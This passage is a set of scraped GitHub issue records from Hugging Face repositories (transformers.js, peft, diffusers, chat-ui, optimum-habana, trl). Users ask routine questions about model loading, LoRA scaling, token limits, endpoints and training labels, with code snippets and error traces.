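For reference, the Python-side pipeline I'm hoping could be mirrored is roughly the following (the TAPAS checkpoint is just an example; any table QA model would do):

```python
from transformers import pipeline

# Table QA pipelines take a table (dict of column -> list of cells) plus a query
tqa = pipeline("table-question-answering", model="google/tapas-base-finetuned-wtq")

table = {
    "City": ["Paris", "London", "Lyon"],
    "Population": ["2.1M", "8.9M", "0.5M"],
}
# Returns the answer along with the coordinates of the supporting cells
print(tqa(table=table, query="Which city has the largest population?"))
```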
It's noted that these aren't supported, but is there any reason they wouldn't work if leveraged?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/192", "state": "open", "labels": [ "question" ], "created_at": "2023-07-12T01:12:07Z", "updated_at": "2023-07-13T16:18:19Z", "user": "timtutt" }, { "repo": "huggingface/peft", "number": 685, "title": "Matrix mistmatch when trying to adapt Falcon with QLoRA, how to fix?", "body": "### System Info\n\n```\r\n(data_quality) brando9~ $ python collect_env.py\r\nCollecting environment information...\r\nPyTorch version: 2.0.1\r\nIs debug build: False\r\nCUDA used to build PyTorch: 11.7\r\nROCM used to build PyTorch: N/A\r\n\r\nOS: Ubuntu 20.04.4 LTS (x86_64)\r\nGCC version: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0\r\nClang version: Could not collect\r\nCMake version: version 3.26.4\r\nLibc version: glibc-2.31\r\n\r\nPython version: 3.10.11 (main, May 16 2023, 00:28:57) [GCC 11.2.0] (64-bit runtime)\r\nPython platform: Linux-5.4.0-122-generic-x86_64-with-glibc2.31\r\nIs CUDA available: True\r\nCUDA runtime version: 11.7.64\r\nCUDA_MODULE_LOADING set to: LAZY\r\nGPU models and configuration:\r\nGPU 0: NVIDIA A100-SXM4-80GB\r\nGPU 1: NVIDIA A100-SXM4-80GB\r\nGPU 2: NVIDIA A100-SXM4-80GB\r\nGPU 3: NVIDIA A100-SXM4-80GB\r\nGPU 4: NVIDIA A100-SXM4-80GB\r\nGPU 5: NVIDIA A100-SXM4-80GB\r\nGPU 6: NVIDIA A100-SXM4-80GB\r\nGPU 7: NVIDIA A100-SXM4-80GB\r\n\r\nNvidia driver version: 515.43.04\r\ncuDNN version: Could not collect\r\nHIP runtime version: N/A\r\nMIOpen runtime version: N/A\r\nIs XNNPACK available: True\r\n\r\nCPU:\r\nArchitecture: x86_64\r\nCPU op-mode(s): 32-bit, 64-bit\r\nByte Order: Little Endian\r\nAddress sizes: 48 bits physical, 48 bits virtual\r\nCPU(s): 128\r\nOn-line CPU(s) list: 0-127\r\nThread(s) per core: 2\r\nCore(s) per socket: 32\r\nSocket(s): 2\r\nNUMA node(s): 2\r\nVendor ID: AuthenticAMD\r\nCPU family: 25\r\nModel: 1\r\nModel name: AMD EPYC 7543 32-Core Processor\r\nStepping: 1\r\nFrequency boost: enabled\r\nCPU MHz: 3455.484\r\nCPU max MHz: 2800.0000\r\nCPU min MHz: 1500.0000\r\nBogoMIPS: 5599.81\r\nVirtualization: AMD-V\r\nL1d cache: 2 MiB\r\nL1i cache: 2 MiB\r\nL2 cache: 32 MiB\r\nL3 cache: 512 MiB\r\nNUMA node0 CPU(s): 0-31,64-95\r\nNUMA node1 CPU(s): 32-63,96-127\r\nVulnerability Itlb multihit: Not affected\r\nVulnerability L1tf: Not affected\r\nVulnerability Mds: Not affected\r\nVulnerability Meltdown: Not affected\r\nVulnerability Mmio stale data: Not affected\r\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\r\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\r\nVulnerability Spectre v2: Mitigation; Retpolines, IBPB conditional, IBRS_FW, STIBP always-on, RSB filling\r\nVulnerability Srbds: Not affected\r\nVulnerability Tsx async abort: Not affected\r\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 invpcid_single hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 invpcid cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc 
cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload vgif umip pku ospke vaes vpclmulqdq rdpid overflow_recov succor smca\r\n\r\nVersions of relevant libraries:\r\n[pip3] numpy==1.25.0\r\n[pip3] torch==2.0.1\r\n[pip3] torchaudio==2.0.2\r\n[pip3] torchvision==0.15.2\r\n[pip3] triton==2.0.0\r\n[conda] blas 1.0 mkl\r\n[conda] ffmpeg 4.3 hf484d3e_0 pytorch\r\n[conda] mkl 2023.1.0 h6d00ec8_46342\r\n[conda] mkl-service 2.4.0 py310h5eee18b_1\r\n[conda] mkl_fft 1.3.6 py310h1128e8f_1\r\n[conda] mkl_random 1.2.2 py310h1128e8f_1\r\n[conda] numpy 1.25.1 pypi_0 pypi\r\n[conda] numpy-base 1.25.0 py310hb5e798b_0\r\n[conda] pytorch 2.0.1 py3.10_cuda11.7_cudnn8.5.0_0 pytorch\r\n[conda] pytorch-cuda 11.7 h778d358_5 pytorch\r\n[conda] pytorch-mutex 1.0 cuda pytorch\r\n[conda] torchaudio 2.0.2 py310_cu117 pytorch\r\n[conda] torchtriton 2.0.0 py310 pytorch\r\n[conda] torchvision 0.", "url": "https://github.com/huggingface/peft/issues/685", "state": "closed", "labels": [], "created_at": "2023-07-11T20:01:37Z", "updated_at": "2023-07-24T00:11:02Z", "user": "brando90" }, { "repo": "huggingface/diffusers", "number": 4047, "title": "How to set lora scale when loading a LoRA model?", "body": "Hey there, first of all thanks for your fantastic work!\r\n\r\nI am loading LoRA weights, and I would like to set the scale of them being applied. Checking the code, it appears to be possible as shown [here](https://github.com/huggingface/diffusers/blob/fc7aa64ea8f5979b67bd730777e8e1c32e3adb05/src/diffusers/loaders.py#L1094).\r\n\r\nHow can we do it in practice? Is it possible to provide a small code snippet? \r\n\r\nThank you so much! Really appreciate your help :)", "url": "https://github.com/huggingface/diffusers/issues/4047", "state": "closed", "labels": [], "created_at": "2023-07-11T17:38:05Z", "updated_at": "2023-08-29T05:30:44Z", "user": "pietrobolcato" }, { "repo": "huggingface/diffusers", "number": 4042, "title": "How to combine the reference-only with inpainting and depth control?", "body": "### Model/Pipeline/Scheduler description\n\nHi, I want to combine reference-only with image inpainting and depth control, to replace the background in portrait images. However, I have no idea how to build this pipeline, as there is no reference-plus-inpaint pipeline example. Could you please help me figure it out?\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4042", "state": "closed", "labels": [], "created_at": "2023-07-11T12:17:24Z", "updated_at": "2023-07-14T06:12:29Z", "user": "AmberCheng" }, { "repo": "huggingface/chat-ui", "number": 340, "title": "[WebSearch] \"Input validation error: `inputs` tokens + `max_new_tokens` must be <= 1512. Given: 1000 `inputs` tokens and 1024 `max_new_tokens`\"", "body": "Hello there, \r\n\r\nTitle says it all. \r\nWe are not using any custom endpoints/models. We're just relying on Hugging Face's Inference API. \r\nIs there a way to increase/decrease the input tokens when using WebSearch (or even just increase the allowed total)? It works fine if `max_new_tokens` is set to 512, but that, obviously, cuts off any answer that goes beyond that limit. 
\r\nSo far, I haven't found a good balance, nor a way to decrease the number of input tokens. \r\n\r\nIn advance, thanks for your answer! \r\n![image](https://github.com/huggingface/chat-ui/assets/109650634/dbc25ae1-d894-48a7-8b0c-5a0bdad33e3e)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/340", "state": "closed", "labels": [ "question", "models" ], "created_at": "2023-07-11T07:33:18Z", "updated_at": "2023-07-12T09:16:21Z", "user": "gollumeo" }, { "repo": "huggingface/diffusers", "number": 4029, "title": "How can I make the diffusers pipeline use a .safetensors file for SDXL?", "body": "Cloning the entire repo takes 100 GB.\r\n\r\nHow can I make the code below use a .safetensors file instead of the diffusers folder layout?\r\n\r\nLet's say I have downloaded my safetensors file to path.safetensors.\r\n\r\nHow do I provide it? \r\n\r\nThe code below works, but we are cloning 100 GB instead of a single 14 GB safetensors file, which is a waste of bandwidth.\r\n\r\n**Also, how can I add a LoRA checkpoint to this pipeline? A LoRA checkpoint made by the Kohya script.**\r\n\r\n```\r\nimport gradio as gr\r\n\r\nfrom diffusers import DiffusionPipeline\r\nimport torch\r\n\r\nimport base64\r\nfrom io import BytesIO\r\nimport os\r\nimport gc\r\nfrom datetime import datetime\r\n\r\nfrom share_btn import community_icon_html, loading_icon_html, share_js\r\n\r\n# SDXL code: https://github.com/huggingface/diffusers/pull/3859\r\n\r\nmodel_dir = '/workspace'\r\naccess_token = os.getenv(\"ACCESS_TOKEN\")\r\n\r\nif model_dir:\r\n # Use local model\r\n model_key_base = os.path.join(model_dir, \"stable-diffusion-xl-base-0.9\")\r\n model_key_refiner = os.path.join(model_dir, \"stable-diffusion-xl-refiner-0.9\")\r\nelse:\r\n model_key_base = \"stabilityai/stable-diffusion-xl-base-0.9\"\r\n model_key_refiner = \"stabilityai/stable-diffusion-xl-refiner-0.9\"\r\n\r\n# Use refiner (enabled by default)\r\nenable_refiner = os.getenv(\"ENABLE_REFINER\", \"true\").lower() == \"true\"\r\n# Output images before the refiner and after the refiner\r\noutput_images_before_refiner = True\r\n\r\n# Create public link\r\nshare = os.getenv(\"SHARE\", \"false\").lower() == \"true\"\r\n\r\nprint(\"Loading model\", model_key_base)\r\npipe = DiffusionPipeline.from_pretrained(model_key_base, torch_dtype=torch.float16, use_auth_token=access_token)\r\n\r\n#pipe.enable_model_cpu_offload()\r\npipe.to(\"cuda\")\r\n\r\n# if using torch < 2.0\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\n\r\n\r\n# pipe.unet = torch.compile(pipe.unet, mode=\"reduce-overhead\", fullgraph=True)\r\n\r\nif enable_refiner:\r\n print(\"Loading model\", model_key_refiner)\r\n pipe_refiner = DiffusionPipeline.from_pretrained(model_key_refiner, torch_dtype=torch.float16, use_auth_token=access_token)\r\n #pipe_refiner.enable_model_cpu_offload()\r\n pipe_refiner.to(\"cuda\")\r\n\r\n # if using torch < 2.0\r\n pipe_refiner.enable_xformers_memory_efficient_attention()\r\n\r\n # pipe_refiner.unet = torch.compile(pipe_refiner.unet, mode=\"reduce-overhead\", fullgraph=True)\r\n\r\n# NOTE: we do not have word list filtering in this gradio demo\r\n\r\n\r\n\r\nis_gpu_busy = False\r\n\r\ndef infer(prompt, negative, scale, samples=4, steps=50, refiner_strength=0.3, num_images=1):\r\n prompt, negative = [prompt] * samples, [negative] * samples\r\n images_b64_list = []\r\n\r\n for i in range(0, num_images):\r\n images = pipe(prompt=prompt, negative_prompt=negative, guidance_scale=scale, num_inference_steps=steps).images\r\n os.makedirs(r\"stable-diffusion-xl-demo/outputs\", exist_ok=True)\r\n 
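# (Aside, back to my main question: ideally the two
# DiffusionPipeline.from_pretrained(...) calls above would be replaced by a
# single-file load, something along the lines of
#     pipe = StableDiffusionXLPipeline.from_single_file("path.safetensors", torch_dtype=torch.float16)
# with the Kohya LoRA attached via something like
#     pipe.load_lora_weights("my_lora.safetensors")
# "path.safetensors" and "my_lora.safetensors" are placeholders here, and I'm
# not sure whether these entry points fully support SDXL yet.)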
gc.collect()\r\n torch.cuda.empty_cache()\r\n \r\n\t\t\r\n if enable_refiner:\r\n if output_images_before_refiner:\r\n for image in images:\r\n buffered = BytesIO()\r\n image.save(buffered, format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\r\n \r\n image_b64 = (f\"data:image/jpeg;base64,{img_str}\")\r\n images_b64_list.append(image_b64)\r\n\r\n images = pipe_refiner(prompt=prompt, negative_prompt=negative, image=images, num_inference_steps=steps, strength=refiner_strength).images\r\n\r\n gc.collect()\r\n torch.cuda.empty_cache()\r\n\r\n # Create the outputs folder if it doesn't exist\r\n \r\n\r\n for i, image in enumerate(images):\r\n buffered = BytesIO()\r\n image.save(buffered, format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\r\n timestamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\n image_b64 = (f\"data:image/jpeg;base64,{img_str}\")\r\n images_b64_list.append(image_b64)\r\n # Save the image as PNG with unique timestamp\r\n filename = f\"stable-diffusion-xl-demo/outputs/generated_image_{timestamp}_{i}.png\"\r\n image.save(filename, format=\"PNG\")\r\n\r\n return images_b64_list\r\n\r\n```\r\n\r\n ", "url": "https://github.com/huggingface/diffusers/issues/4029", "state": "closed", "labels": [], "created_at": "2023-07-10T21:52:22Z", "updated_at": "2023-12-11T18:45:18Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 337, "title": "Feature Request: Save messages and error message even if text generation endpoint fails", "body": "Situation: Text generation endpoint is not running. Then user sends a message.\r\nCurrent Behavior: UI throws an error and saves conversation to mongodb like this, with an empty message list.\r\n```\r\n{\r\n _id: ObjectId('64ac1abc2ac09222e24cc984'),\r\n title: 'Untitled 5',\r\n messages: [],\r\n model: 'GPT',\r\n createdAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n updatedAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n sessionId: '0048fb5c-a224-49c2-a7be-ea417defa6e2'\r\n}\r\n```\r\n\r\nDesired behavior: UI throws an error and saves conversation to mongodb with the user's message and the error message inside.\r\n```\r\n{\r\n _id: ObjectId('64ac1abc2ac09222e24cc984'),\r\n title: 'Untitled 5',\r\n messages: [\r\n {\r\n content: 'What is 2-2?',\r\n from: 'user',\r\n id: '874cfd40-2c61-49fe-b9f6-8b296a79ab6a',\r\n },\r\n {\r\n from: 'assistant',\r\n error: 'TypeError: fetch failed\r\n at fetch (C:\\chat-ui\\node_modules\\undici\\index.js:109:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/node_modules/@sveltejs/kit/src/runtime/server/fetch.js:32:10)\r\n at async POST (/src/routes/conversation/[id]/+server.ts:90:16)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///C:/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22 {\r\n cause: Error: connect ECONNREFUSED 127.0.0.1:80\r\n at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1532:16) {\r\n errno: -4078,\r\n code: 'ECONNREFUSED',\r\n syscall: 'connect',\r\n address: '127.0.0.1',\r\n port: 80\r\n }\r\n}\r\n },\r\n ],\r\n model: 'GPT',\r\n createdAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n updatedAt: 
ISODate('2023-07-10T14:50:36.324Z'),\r\n sessionId: '0048fb5c-a224-49c2-a7be-ea417defa6e2'\r\n}\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/337", "state": "closed", "labels": [ "enhancement", "back", "p2" ], "created_at": "2023-07-10T15:18:52Z", "updated_at": "2023-10-10T11:16:22Z", "comments": 1, "user": "loganlebanoff" }, { "repo": "huggingface/transformers.js", "number": 187, "title": "[Question] Performance and size of models", "body": "Great project, tons of potential! I have a general question I thought I may ask. Using the convert.py scripts, I took a PyTorch model and converted it to ONNX. With quantizing, I get a full 428MB model and a 110MB _quantized model. Now, how does it work for the user exactly? Does the user automatically download the _quantized one?\r\n\r\nWould this be accurate:\r\n\r\n- WASM downloaded/loaded (e.g., 15MB)\r\n- Transformers.js runs the core\r\n- Model downloaded/loaded (e.g., 110MB)\r\n- Model starts and runs\r\n- Result is returned\r\n- (next time it is called, WASM is reloaded and model is cached)\r\n\r\n125MB is still quite big for the web: [https://huggingface.co/plopop/industry-classification-api-onnx](https://huggingface.co/plopop/industry-classification-api-onnx)\r\n\r\nWith something like [https://huggingface.co/Xenova/mobilebert-uncased-mnli](https://huggingface.co/Xenova/mobilebert-uncased-mnli) (27MB), running everything within a worker takes 8-15 seconds depending on the input on our end right now; are there any other performance gains to be had, or would the only way be to optimize the source model further?", "url": "https://github.com/huggingface/transformers.js/issues/187", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-10T14:39:31Z", "updated_at": "2023-07-11T17:06:38Z", "user": "sabatale" }, { "repo": "huggingface/chat-ui", "number": 336, "title": "how to work in chat-ui with non streaming data?", "body": "I am working with chat-ui by providing only my endpoint, which is hosted at localhost:8000/generate. I don't have a model, only endpoints, so can you provide a solution for working with endpoints only and with non-streaming data (application/json or application/plain)? 
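One idea I had, in case chat-ui strictly requires a streaming endpoint: put a tiny proxy in front of my non-streaming API that re-emits the JSON answer as a single server-sent event. This is only a sketch; the event shape below is my guess at a TGI-style payload, and my endpoint returning a `generated_text` field is an assumption:

```python
import json

import requests
from fastapi import FastAPI, Request
from fastapi.responses import StreamingResponse

app = FastAPI()

@app.post("/generate_stream")
async def generate_stream(request: Request):
    payload = await request.json()
    # Call the existing non-streaming endpoint (blocking call, fine for a sketch)
    answer = requests.post("http://10.0.2.27:8000/generate", json=payload).json()

    def events():
        text = answer.get("generated_text", "")
        token = {"id": 0, "text": text, "logprob": 0.0, "special": False}
        # Emit the whole answer as one SSE event instead of token by token
        yield "data:" + json.dumps({"token": token, "generated_text": text, "details": None}) + "\n\n"

    return StreamingResponse(events(), media_type="text/event-stream")
```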
For context, I have the model hosted on this server. In modelEndpoint.ts:\r\n```\r\nif (!model.endpoints) {\r\n\t\treturn {\r\n\t\t\turl: `http://10.0.2.27:8000/generate`,\r\n\t\t\t// authorization: `Bearer ${HF_ACCESS_TOKEN}`,\r\n\t\t\t// weight: 1,\r\n\t\t};\r\n\t}\r\n```\r\nand I get this error:\r\n```\r\nError: An error occurred while fetching the blob\r\n at request (file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@huggingface/inference/dist/index.mjs:89:11)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Proxy.textGeneration (file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@huggingface/inference/dist/index.mjs:457:15)\r\n at async Module.generateFromDefaultEndpoint (/src/lib/server/generateFromDefaultEndpoint.ts:22:28)\r\n at async POST (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/src/routes/conversation/[id]/summarize/+server.ts:30:26)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22\r\n```\r\n", "url": "https://github.com/huggingface/chat-ui/issues/336", "state": "closed", "labels": [], "created_at": "2023-07-10T13:43:17Z", "updated_at": "2023-07-11T08:29:40Z", "user": "swikrit21" }, { "repo": "huggingface/transformers.js", "number": 186, "title": "[Question] How to interpret boxes in object detection example ?", "body": "Hi,\r\n\r\nCan anyone help me interpret the boxes when using object detection with the model \"Xenova/detr-resnet-50\"?\r\nI want to crop the detected object out of the image using sharp (Node.js). How can I pass these boxes to sharp's resize function? \r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/186", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-10T12:59:22Z", "updated_at": "2023-07-11T00:55:13Z", "user": "geminigeek" }, { "repo": "huggingface/chat-ui", "number": 335, "title": "Bug: Unexpected execution result on Firefox browser with Chat-UI ver. 0.3.0", "body": "I recently installed the 0.3.0 version of the HF Chat-UI software. \r\nI then performed an evaluation using the **HuggingFaceH4/starchat-beta** model. \r\nAt that time, I typed the question \"_Could you tell me about the weather in Tokyo City in Japan on July-10-2023_?\" and ran it.\r\n\r\n\r\nUnfortunately, the results varied between browsers. \r\nIn the Firefox browser, the result is displayed normally. \r\nHowever, the following error occurs in the Chrome browser. \r\n\r\n* **Error message:** \r\n```\r\n403 You don't have access to this conversation. \r\nIf someone gave you this link, ask them to use the 'share' feature instead.\r\n```\r\n\r\n\r\nI was wondering if anyone else is experiencing the same issue, any comments are welcome.\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/335", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-10T04:40:40Z", "updated_at": "2023-09-11T09:32:14Z", "comments": 2, "user": "leemgs" }, { "repo": "huggingface/chat-ui", "number": 334, "title": "Chat-ui is starting, but nothing happens", "body": "# Description:\r\n\r\nWhen starting the Chat-ui, the initialization process begins as expected but stalls indefinitely, without any evident progress. 
The application doesn't crash nor give any errors. This issue occurs across multiple attempts, regardless of browser type or device.\r\n\r\n# Steps to reproduce:\r\n- Install prerequisites\r\n- Fill in the .env.local file\r\n- Launch a DB container for chat persistence\r\n- Start Chat-UI\r\n- Open a browser (e.g., Chrome, Firefox, Safari)\r\n- Navigate to the Chat-ui web address.\r\n- Observe the behavior.\r\n\r\n# Expected result:\r\n\r\nAfter navigating to the url, the Chat-ui should initialize and allow for the use of its various functionalities.\r\n\r\n# Actual result:\r\n\r\nThe UI remains in a state of 'loading' indefinitely without any change, timing out after some time.\r\n\r\n# Environment:\r\nThis issue was reproduced on:\r\n1. Operating System: Ubuntu 22.04, Fedora Workstation 38\r\n2. Node Version: v18.16.1\r\n3. NPM Version: 9.5.1\r\n\r\nAdditional context:\r\n- No error messages are displayed.\r\n- There is no notable console log information.\r\n- Network status is stable during the process.\r\n- Similar behavior noticed on Fedora.\r\n- Refreshing the browser, clearing the cache, or using a different browser does not resolve the issue.\r\n- Firewall is disabled on host\r\n\r\nIf you need any further information, I would be glad to provide it. Thanks in advance!", "url": "https://github.com/huggingface/chat-ui/issues/334", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-09T13:53:34Z", "updated_at": "2023-09-11T09:31:49Z", "comments": 2, "user": "Notespeak" }, { "repo": "huggingface/diffusers", "number": 3988, "title": "how to use part of the controlnet models with a \"StableDiffusionControlNetInpaintPipeline\" object?", "body": "I created a \"StableDiffusionControlNetInpaintPipeline\" object with a list of controlnet models such as \"canny\" and \"openpose\", but sometimes I want to use canny only or openpose only. Is there a way to reuse part of the controlnet models with an already-initialized \"StableDiffusionControlNetInpaintPipeline\" object?", "url": "https://github.com/huggingface/diffusers/issues/3988", "state": "closed", "labels": [], "created_at": "2023-07-07T09:18:18Z", "updated_at": "2023-08-01T04:51:41Z", "user": "AdamMayor2018" }, { "repo": "huggingface/optimum-habana", "number": 292, "title": "Where in the directory \"/tmp/tst-summarization\" is the summarization output stored? ", "body": "### System Info\n\n```shell\nOptimum Habana : 1.6.0\r\nSynapseAI : 1.10.0\r\nDocker Image : Habana\u00ae Deep Learning Base AMI (Ubuntu 20.04)\r\nVolume : 1000 GiB\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nStart an EC2 instance with DL1 Resource and this image : Habana\u00ae Deep Learning Base AMI (Ubuntu 20.04)\r\nRun these commands\r\na. docker run -it --runtime=habana -e HABANA_VISIBLE_DEVICES=all -e OMPI_MCA_btl_vader_single_copy_mechanism=none --cap-add=sys_nice --net=host --ipc=host vault.habana.ai/gaudi-docker/1.10.0/ubuntu20.04/habanalabs/pytorch-installer-2.0.1:latest\r\nb. git clone https://github.com/huggingface/optimum-habana.git\r\nc. pip install optimum[habana]\r\nd. cd examples\r\ne. cd summarization\r\nf. 
pip install -r requirements.txt\r\n\r\npython run_summarization.py \\\r\n --model_name_or_path t5-small \\\r\n --do_eval \\\r\n --dataset_name cnn_dailymail \\\r\n --dataset_config \"3.0.0\" \\\r\n --source_prefix \"summarize: \" \\\r\n --output_dir /tmp/tst-summarization \\\r\n --per_device_train_batch_size 4 \\\r\n --per_device_eval_batch_size 4 \\\r\n --overwrite_output_dir \\\r\n --predict_with_generate \\\r\n --use_habana \\\r\n --use_lazy_mode \\\r\n --use_hpu_graphs_for_inference \\\r\n --gaudi_config_name Habana/t5 \\\r\n --ignore_pad_token_for_loss False \\\r\n --pad_to_max_length \\\r\n --save_strategy epoch \\\r\n --throughput_warmup_steps 3\r\n\n\n### Expected behavior\n\nNeed a file with the summarized text and not just the evaluation metrics", "url": "https://github.com/huggingface/optimum-habana/issues/292", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-07T03:24:31Z", "updated_at": "2023-07-18T08:30:21Z", "user": "Abhaycnvrg" }, { "repo": "huggingface/trl", "number": 503, "title": "How to get labels into the SFTTrainer", "body": "Hi!\r\nI am trying to prompt tune medalpaca 7b using prompt tuning or lora with the SFTTrainer. I have a prompt and I have labels that I want the model to output. I have made a Dataset class that inherits from torch.utils.data.Dataset to prepare my inputs, but I am wondering, if there is some way to make the trainer use the datapoint[\"labels\"] part during training? :\r\nclass DiagnosesDataset(torch.utils.data.Dataset):\r\n\tdef __init__(self, instances, tokenizer):\r\n\t\tself.instances=instances\r\n\t\t#self.labels=labels\r\n\t\tself.tokenizer=tokenizer\r\n\t\t\r\n\tdef __getitem__(self, idx):\r\n\t\titem={}\r\n\t\tprompt= self.instances[\"prompt\"][idx]\r\n\t\tlabels = self.instances[\"label\"][idx]\r\n\r\n\t\titem=self.tokenize(prompt+labels)\r\n\t\ttokenized_instruction=self.tokenize(prompt)\r\n\t\tlabel_instruction=self.tokenizer(labels)\r\n\r\n\t\ti=len(tokenized_instruction[\"input_ids\"])\r\n\t\titem[\"labels\"][i:]=label_instruction[\"input_ids\"]\r\n\r\n\t\treturn item\r\n\r\n\tdef tokenize(self, prompt):\r\n\t\tresult_prompt=self.tokenizer(prompt, \r\n\t\t\t\ttruncation=True, \r\n\t\t\t\tmax_length=2048,\r\n\t\t\t\tpadding=False,\r\n\t\t\t\treturn_tensors=None)\r\n\r\n\t\tresult_prompt[\"labels\"]=[-100]*len(result_prompt[\"input_ids\"])\t\r\n\t\treturn result_prompt\r\n\r\n\tdef __len__(self):\r\n\t\treturn len(self.instances)\r\nI am calling the trainer like this:\r\n\ttrainer=SFTTrainer(\r\n\t\tmodel=model,\r\n\t\ttokenizer=tokenizer,\r\n\t\ttrain_dataset=dataset,\r\n\t\tpeft_config=peft_config,\r\n\t\tpacking=True,\r\n data_coolator=DataCollatorForSeq2Seq(tokenizer, pad_to_multiple_of=8, return_tensors=\"pt\", padding=\"max_length\", max_length=2048)\r\n\t\targs=training_arguments)\r\n\ttrainer.train()\r\n\r\n\r\n\r\nThis is the error I am currently getting, but I am not sure, this has something to do with sfttrainer \r\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Traceback (most recent call last) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 /home/students/kulcsar/Bachelor/for_dataset/10000_diagnoses/falcon_model_pef \u2502\r\n\u2502 t.py:544 in \u2502\r\n\u2502 \u2502\r\n\u2502 541 \u2502 \u2502\r\n\u2502 542 \u2502 \u2502\r\n\u2502 543 \u2502 args=parser.parse_args() \u2502\r\n\u2502 \u2771 544 \u2502 run() \u2502\r\n\u2502 
545 \u2502 #main() \u2502\r\n\u2502 546 \u2502 \u2502\r\n\u2502 547 \u2502 #all_data, prompts, golds=preprocess(\"./dataset.pkl\") \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/Bachelor/for_dataset/10000_diagnoses/falcon_model_pef \u2502\r\n\u2502 t.py:153 in run \u2502\r\n\u2502 \u2502\r\n\u2502 150 \u2502 \u2502 packing=True, \u2502\r\n\u2502 151 \u2502 \u2502 data_collator=DataCollatorForSeq2Seq(tokenizer, pad_to_multipl \u2502\r\n\u2502 152 \u2502 \u2502 args=training_arguments) \u2502\r\n\u2502 \u2771 153 \u2502 trainer.train() \u2502\r\n\u2502 154 \u2502 \u2502\r\n\u2502 155 \u2502 logging.info(\"Run Train loop\") \u2502\r\n\u2502 156 \u2502 #model_updated=train(model, dataset, args.seed, args.batch_size, a \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/anaconda3/envs/software_bubble_updated_pytorch/lib/py \u2502\r\n\u2502 thon3.9/site-packages/transformers/trainer.py:1537 in train \u2502\r\n\u2502 \u2502\r\n\u2502 1534 \u2502 \u2502 inner_training_loop = find_executable_batch_size( \u2502\r\n\u2502 1535 \u2502 \u2502 \u2502 self._inner_training_loop, self._train_batch_size, args.a \u2502\r\n\u2502 1536 \u2502 \u2502 ) \u2502\r\n\u2502 \u2771 1537 \u2502 \u2502 return inner_training_loop( \u2502\r\n\u2502 1538 \u2502 \u2502 \u2502 args=args, \u2502\r\n\u2502 1539 \u2502 \u2502 \u2502 